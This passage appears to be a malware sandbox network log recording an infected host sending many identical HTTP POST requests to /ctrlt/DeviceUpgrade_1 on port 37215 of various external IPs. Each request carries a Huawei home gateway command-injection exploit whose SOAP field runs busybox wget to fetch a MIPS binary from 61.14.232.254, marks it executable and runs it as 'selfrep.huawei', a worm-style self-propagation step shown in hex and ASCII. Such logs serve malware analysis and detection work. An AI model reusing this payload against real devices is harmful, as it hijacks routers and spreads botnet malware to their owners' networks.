69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  245192.168.2.134442241.35.184.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668206930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  246192.168.2.1349192157.70.17.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668209076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  247192.168.2.134595041.114.159.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668212891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  248192.168.2.1356320157.205.52.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668466091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  249192.168.2.1350718197.248.92.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668476105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  250192.168.2.133905441.68.154.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668503046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  251192.168.2.135916241.91.55.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668550014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  252192.168.2.1355386157.223.186.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668550014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  253192.168.2.1339554193.90.236.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668585062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  254192.168.2.1342362197.58.77.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668621063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  255192.168.2.134631641.202.56.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668628931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
